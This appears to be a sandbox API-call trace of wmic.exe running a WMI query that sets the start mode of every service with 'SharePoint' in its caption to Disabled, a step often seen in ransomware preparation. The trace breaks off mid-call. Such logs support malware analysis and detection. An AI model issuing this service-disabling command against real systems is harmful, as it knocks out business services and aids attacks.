lstrlenW (lpString="EXIT") returned 4 [0121.492] lstrlenW (lpString="SERVICE") returned 7 [0121.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0121.492] WbemLocator:IUnknown:AddRef (This=0x943428) returned 0x2 [0121.492] lstrlenW (lpString="/") returned 1 [0121.492] lstrlenW (lpString="SERVICE") returned 7 [0121.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0121.492] lstrlenW (lpString="-") returned 1 [0121.492] lstrlenW (lpString="SERVICE") returned 7 [0121.492] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0121.492] lstrlenW (lpString="CLASS") returned 5 [0121.492] lstrlenW (lpString="SERVICE") returned 7 [0121.493] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0121.493] lstrlenW (lpString="PATH") returned 4 [0121.493] lstrlenW (lpString="SERVICE") returned 7 [0121.493] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0121.493] lstrlenW (lpString="CONTEXT") returned 7 [0121.493] lstrlenW (lpString="SERVICE") returned 7 [0121.493] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0121.493] lstrlenW (lpString="SERVICE") returned 7 [0121.493] lstrlenW (lpString="SERVICE") returned 7 [0121.493] GetCurrentThreadId () returned 0xca0 [0121.493] ??0CHString@@QAE@XZ () returned 0x88fa40 [0121.493] WbemLocator:IWbemLocator:ConnectServer (in: This=0x943428, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x960db0) returned 0x0 [0121.516] CoSetProxyBlanket (pProxy=0x960db0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0121.516] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.516] GetCurrentThreadId () returned 0xca0 [0121.516] ??0CHString@@QAE@XZ () returned 0x88f9e8 [0121.516] SysStringLen (param_1="root\\cli") returned 0x8 [0121.516] SysStringLen (param_1="\\") returned 0x1 [0121.516] SysStringLen (param_1="root\\cli\\") returned 0x9 [0121.516] SysStringLen (param_1="ms_409") returned 0x6 [0121.516] WbemLocator:IWbemLocator:ConnectServer (in: This=0x943428, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x960720) returned 0x0 [0121.524] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.524] GetCurrentThreadId () returned 0xca0 [0121.524] ??0CHString@@QAE@XZ () returned 0x88fa44 [0121.524] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0121.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xb48ae8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0121.524] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0121.524] SysStringLen (param_1="SERVICE") returned 0x7 [0121.524] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0121.524] SysStringLen (param_1="'") returned 0x1 [0121.525] IWbemServices:GetObject (in: This=0x960db0, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x88fa40*=0x0, ppCallResult=0x0 | out: ppObject=0x88fa40*=0x985df0, ppCallResult=0x0) returned 0x0 [0121.532] IWbemClassObject:Get (in: This=0x985df0, wszName="Target", lFlags=0, pVal=0x88fa18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88fa18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.532] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0121.532] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0121.532] IWbemClassObject:Get (in: This=0x985df0, wszName="PWhere", lFlags=0, pVal=0x88fa18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88fa18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.532] lstrlenW (lpString="WHERE Name='#'") returned 14 [0121.532] lstrlenW (lpString="WHERE Name='#'") returned 14 [0121.532] IWbemClassObject:Get (in: This=0x985df0, wszName="Connection", lFlags=0, pVal=0x88fa18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88fa18*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9861b0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.532] IUnknown:QueryInterface (in: This=0x9861b0, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x88fa34 | out: ppvObject=0x88fa34*=0x9861b0) returned 0x0 [0121.532] GetCurrentThreadId () returned 0xca0 [0121.532] ??0CHString@@QAE@XZ () returned 0x88f9b4 [0121.532] IWbemClassObject:Get (in: This=0x9861b0, wszName="Namespace", lFlags=0, pVal=0x88f998*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f998*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.532] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0121.532] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0121.532] IWbemClassObject:Get (in: This=0x9861b0, wszName="Locale", lFlags=0, pVal=0x88f998*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9668dc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f998*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.533] lstrlenW (lpString="ms_409") returned 6 [0121.533] lstrlenW (lpString="ms_409") returned 6 [0121.533] IWbemClassObject:Get (in: This=0x9861b0, wszName="User", lFlags=0, pVal=0x88f998*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9668dc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f998*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.533] IWbemClassObject:Get (in: This=0x9861b0, wszName="Password", lFlags=0, pVal=0x88f998*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f998*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.533] IWbemClassObject:Get (in: This=0x9861b0, wszName="Server", lFlags=0, pVal=0x88f998*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f998*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.533] lstrlenW (lpString=".") returned 1 [0121.533] lstrlenW (lpString=".") returned 1 [0121.533] IWbemClassObject:Get (in: This=0x9861b0, wszName="Authority", lFlags=0, pVal=0x88f998*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9668dc, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f998*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.533] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.533] IUnknown:Release (This=0x9861b0) returned 0x1 [0121.533] GetCurrentThreadId () returned 0xca0 [0121.533] ??0CHString@@QAE@XZ () returned 0x88f9a4 [0121.533] IWbemClassObject:Get (in: This=0x985df0, wszName="__RELPATH", lFlags=0, pVal=0x88f98c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f98c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.533] GetCurrentThreadId () returned 0xca0 [0121.533] ??0CHString@@QAE@XZ () returned 0x88f920 [0121.533] ??0CHString@@QAE@PBG@Z () returned 0x88f91c [0121.533] ??0CHString@@QAE@ABV0@@Z () returned 0x88f89c [0121.533] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0121.533] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xb48ae8 [0121.533] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0121.533] ?Left@CHString@@QBE?AV1@H@Z () returned 0x88f894 [0121.534] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x88f898 [0121.534] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x88f91c [0121.534] ??1CHString@@QAE@XZ () returned 0x1 [0121.534] ??1CHString@@QAE@XZ () returned 0x1 [0121.534] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x88f890 [0121.534] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x88f89c [0121.534] ??1CHString@@QAE@XZ () returned 0x1 [0121.534] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xb48b48 [0121.534] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0121.534] ?Left@CHString@@QBE?AV1@H@Z () returned 0x88f894 [0121.534] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x88f898 [0121.534] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x88f91c [0121.534] ??1CHString@@QAE@XZ () returned 0x1 [0121.534] ??1CHString@@QAE@XZ () returned 0x1 [0121.534] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x88f890 [0121.534] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x88f89c [0121.534] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.534] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0121.534] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.534] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0121.534] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0121.534] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0121.534] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0121.534] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0121.534] SysStringLen (param_1="\"") returned 0x1 [0121.534] IWbemServices:GetObject (in: This=0x960720, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x88f92c*=0x0, ppCallResult=0x0 | out: ppObject=0x88f92c*=0x986590, ppCallResult=0x0) returned 0x0 [0121.536] IWbemClassObject:Get (in: This=0x986590, wszName="Text", lFlags=0, pVal=0x88f8f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x88f8f8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9700a8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x9634b0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.536] SafeArrayGetLBound (in: psa=0x9700a8, nDim=0x1, plLbound=0x88f908 | out: plLbound=0x88f908) returned 0x0 [0121.536] SafeArrayGetUBound (in: psa=0x9700a8, nDim=0x1, plUbound=0x88f90c | out: plUbound=0x88f90c) returned 0x0 [0121.536] SafeArrayGetElement (in: psa=0x9700a8, rgIndices=0x88f924, pv=0x88f910 | out: pv=0x88f910) returned 0x0 [0121.536] SysStringLen (param_1="Service application management. ") returned 0x20 [0121.536] IUnknown:Release (This=0x986590) returned 0x0 [0121.536] ??1CHString@@QAE@XZ () returned 0x1 [0121.536] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.536] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.536] lstrlenW (lpString="Service application management. ") returned 32 [0121.536] lstrlenW (lpString="Service application management. ") returned 32 [0121.536] IUnknown:Release (This=0x985df0) returned 0x0 [0121.537] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.537] lstrlenW (lpString="PATH") returned 4 [0121.537] lstrlenW (lpString="WHERE") returned 5 [0121.537] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0121.537] lstrlenW (lpString="WHERE") returned 5 [0121.537] lstrlenW (lpString="WHERE") returned 5 [0121.537] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0121.537] lstrlenW (lpString="/") returned 1 [0121.537] lstrlenW (lpString="caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled") returned 58 [0121.537] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled", cchCount1=58, lpString2="/", cchCount2=1) returned 3 [0121.537] lstrlenW (lpString="-") returned 1 [0121.537] lstrlenW (lpString="caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled") returned 58 [0121.537] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled", cchCount1=58, lpString2="-", cchCount2=1) returned 3 [0121.537] lstrlenW (lpString="caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled") returned 58 [0121.537] lstrlenW (lpString="caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled") returned 58 [0121.537] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0121.537] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0121.537] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc6602887 | out: _String="Select", _Context=0xc6602887) returned="Select" [0121.537] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc6602887 | out: _String=0x0, _Context=0xc6602887) returned="*" [0121.537] lstrlenW (lpString="FROM") returned 4 [0121.537] lstrlenW (lpString="*") returned 1 [0121.537] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0121.537] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc6602887 | out: _String=0x0, _Context=0xc6602887) returned="from" [0121.537] lstrlenW (lpString="FROM") returned 4 [0121.538] lstrlenW (lpString="from") returned 4 [0121.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0121.538] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc6602887 | out: _String=0x0, _Context=0xc6602887) returned="Win32_Service" [0121.538] lstrlenW (lpString="SET") returned 3 [0121.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="SET", cchCount2=3) returned 0 [0121.538] lstrlenW (lpString="CREATE") returned 6 [0121.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="CREATE", cchCount2=6) returned 0 [0121.538] lstrlenW (lpString="GET") returned 3 [0121.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="GET", cchCount2=3) returned 0 [0121.538] lstrlenW (lpString="LIST") returned 4 [0121.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="LIST", cchCount2=4) returned 0 [0121.538] lstrlenW (lpString="ASSOC") returned 5 [0121.538] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=0x0, cchCount1=0, lpString2="ASSOC", cchCount2=5) returned 0 [0121.538] ??0CHString@@QAE@XZ () returned 0x88fb78 [0121.538] memcpy_s (in: _Destination=0x88fad4, _DestinationSize=0xe, _Source=0x966c4c, _SourceSize=0xe | out: _Destination=0x88fad4) returned 0x0 [0121.538] lstrlenW (lpString="&") returned 1 [0121.538] lstrlenW (lpString="&") returned 5 [0121.538] lstrlenW (lpString="<") returned 1 [0121.538] lstrlenW (lpString="<") returned 4 [0121.538] lstrlenW (lpString=">") returned 1 [0121.538] lstrlenW (lpString=">") returned 4 [0121.538] lstrlenW (lpString="'") returned 1 [0121.538] lstrlenW (lpString="'") returned 6 [0121.538] lstrlenW (lpString="\"") returned 1 [0121.538] lstrlenW (lpString=""") returned 6 [0121.538] ?Format@CHString@@QAAXPBGZZ () returned 0xb48bd4 [0121.538] SysStringLen (param_1="") returned 0x0 [0121.538] SysStringLen (param_1="") returned 0x18 [0121.539] ??1CHString@@QAE@XZ () returned 0x1 [0121.539] WbemLocator:IUnknown:AddRef (This=0x943428) returned 0x3 [0121.539] lstrlenW (lpString="") returned 0 [0121.539] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.539] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0121.539] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.539] lstrlenW (lpString="LHNIWSJ") returned 7 [0121.539] GetCurrentThreadId () returned 0xca0 [0121.539] GetCurrentProcess () returned 0xffffffff [0121.539] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x88fab0 | out: TokenHandle=0x88fab0*=0x270) returned 1 [0121.539] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x88faac | out: TokenInformation=0x0, ReturnLength=0x88faac) returned 0 [0121.539] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0xb48bc8, TokenInformationLength=0x118, ReturnLength=0x88faac | out: TokenInformation=0xb48bc8, ReturnLength=0x88faac) returned 1 [0121.539] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0xb48bc8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.539] CloseHandle (hObject=0x270) returned 1 [0121.539] lstrlenW (lpString="GET") returned 3 [0121.539] lstrlenW (lpString="GET") returned 3 [0121.539] lstrlenA (lpString="") returned 0 [0121.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xb48bc8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0121.539] lstrlenA (lpString="") returned 0 [0121.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xb48bc8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0121.539] lstrlenA (lpString="") returned 0 [0121.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xb48bc8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0121.539] lstrlenA (lpString="") returned 0 [0121.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xb48bc8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0121.539] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0121.540] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0121.540] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0xc660681f | out: _String="Select", _Context=0xc660681f) returned="Select" [0121.540] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc660681f | out: _String=0x0, _Context=0xc660681f) returned="*" [0121.540] lstrlenW (lpString="FROM") returned 4 [0121.540] lstrlenW (lpString="*") returned 1 [0121.540] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0121.540] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc660681f | out: _String=0x0, _Context=0xc660681f) returned="from" [0121.540] lstrlenW (lpString="FROM") returned 4 [0121.540] lstrlenW (lpString="from") returned 4 [0121.540] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0121.540] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xc660681f | out: _String=0x0, _Context=0xc660681f) returned="Win32_Service" [0121.540] lstrlenA (lpString=" FROM ") returned 6 [0121.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303744, cbMultiByte=-1, lpWideCharStr=0xb47f88, cchWideChar=7 | out: lpWideCharStr=" FROM ") returned 7 [0121.540] lstrlenA (lpString="SELECT ") returned 7 [0121.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130374c, cbMultiByte=-1, lpWideCharStr=0xb47f58, cchWideChar=8 | out: lpWideCharStr="SELECT ") returned 8 [0121.540] SysStringLen (param_1="SELECT ") returned 0x7 [0121.540] SysStringLen (param_1="*") returned 0x1 [0121.540] SysStringLen (param_1="SELECT *") returned 0x8 [0121.540] SysStringLen (param_1=" FROM ") returned 0x6 [0121.540] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0121.540] SysStringLen (param_1="Win32_Service") returned 0xd [0121.541] lstrlenA (lpString=" WHERE ") returned 7 [0121.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0xb47fd0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0121.541] SysStringLen (param_1=" WHERE ") returned 0x7 [0121.541] SysStringLen (param_1="caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled") returned 0x3a [0121.541] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0121.541] SysStringLen (param_1=" WHERE caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled") returned 0x41 [0121.541] ??0CHString@@QAE@XZ () returned 0x88ba14 [0121.541] GetCurrentThreadId () returned 0xca0 [0121.541] CoCreateInstance (in: rclsid=0x13069fc*(Data1=0x8d1c559d, Data2=0x84f0, Data3=0x4bb3, Data4=([0]=0xa7, [1]=0xd5, [2]=0x56, [3]=0xa7, [4]=0x43, [5]=0x5a, [6]=0x9b, [7]=0xa6)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a0c*(Data1=0xbfbf883a, Data2=0xcad7, Data3=0x11d3, Data4=([0]=0xa1, [1]=0x1b, [2]=0x0, [3]=0x10, [4]=0x5a, [5]=0x1f, [6]=0x51, [7]=0x5a)), ppv=0x134955c | out: ppv=0x134955c*=0x962868) returned 0x0 [0121.595] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.595] ??0CHString@@QAE@XZ () returned 0x88ba10 [0121.595] GetCurrentThreadId () returned 0xca0 [0121.595] SysStringLen (param_1="\\\\") returned 0x2 [0121.595] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0121.595] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0121.595] SysStringLen (param_1="\\") returned 0x1 [0121.595] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0121.595] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0121.595] WbemLocator:IWbemLocator:ConnectServer (in: This=0x943428, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x960900) returned 0x0 [0121.601] CoSetProxyBlanket (pProxy=0x960900, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0121.601] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.601] ??0CHString@@QAE@XZ () returned 0x88b9f4 [0121.601] GetCurrentThreadId () returned 0xca0 [0121.601] ??0CHString@@QAE@XZ () returned 0x88b95c [0121.601] GetCurrentThreadId () returned 0xca0 [0121.601] CoCreateInstanceEx (in: Clsid=0x13069dc*(Data1=0x674b6698, Data2=0xee92, Data3=0x11d0, Data4=([0]=0xad, [1]=0x71, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd8, [6]=0xfd, [7]=0xff)), punkOuter=0x0, dwClsCtx=0x1, pServerInfo=0x0, dwCount=0x1, pResults=0x88b944 | out: pResults=((pIID=0x13069ec*(Data1=0x44aca674, Data2=0xe8fc, Data3=0x11d0, Data4=([0]=0xa0, [1]=0x7c, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pItf=0x9455d8, hr=0x0))) returned 0x0 [0121.602] ??1CHString@@QAE@XZ () returned 0x74a66430 [0121.602] IWbemServices:ExecQuery (in: This=0x960900, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled", lFlags=48, pCtx=0x0, ppEnum=0x88b9e4 | out: ppEnum=0x88b9e4*=0x986aa0) returned 0x0 [0121.604] WbemContext:IWbemContext:SetValue (This=0x9455d8, wszName="ExcludeSystemProperties", lFlags=0, pValue=0x88b994*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0 [0121.604] CoSetProxyBlanket (pProxy=0x986aa0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, 